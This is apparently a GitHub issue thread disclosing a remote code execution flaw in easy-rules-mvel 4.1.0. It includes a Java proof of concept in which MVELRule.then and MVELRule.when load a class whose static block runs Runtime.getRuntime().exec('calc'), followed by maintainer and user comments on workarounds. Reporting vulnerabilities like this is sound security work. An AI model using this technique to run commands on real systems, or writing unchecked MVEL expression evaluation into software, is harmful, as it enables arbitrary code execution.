MVELRule Remote Code Execution

[sirnple]

easy-rules-mvel version: 4.1.0

I have run code like:

try {
    MVELRule mVELRule = new MVELRule();
    MVELRule result = mVELRule.then("jaz.Zer");
} catch (Exception e) {
}

Meanwhile I hava class jaz.Zer in classpath, which content is:

import java.io.IOException;

public class Zer {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}

On Windows platform, above code will open my PC's calculator

Additional: MVELRule.when also leads to this RCE

try {
    MVELRule mVELRule = new MVELRule();
    MVELRule result = mVELRule.when("\bjaz.Zer");
} catch (Exception e) {
}

[dvgaba]

It's a limitation of mvel expression language.

[LuisMedinaG]

Hi! Do you have an update on this, is there a workaround or fix for this?
I see the vulnerability is still open.

[dmuley17]

Do we have any workaround to fix the vulnerability ?

[leaf-soba]

If you don't need new features 4.1.0, just downgrade to 4.0.0, it is a safe version with only a irrelevant vulnerability in JUnit.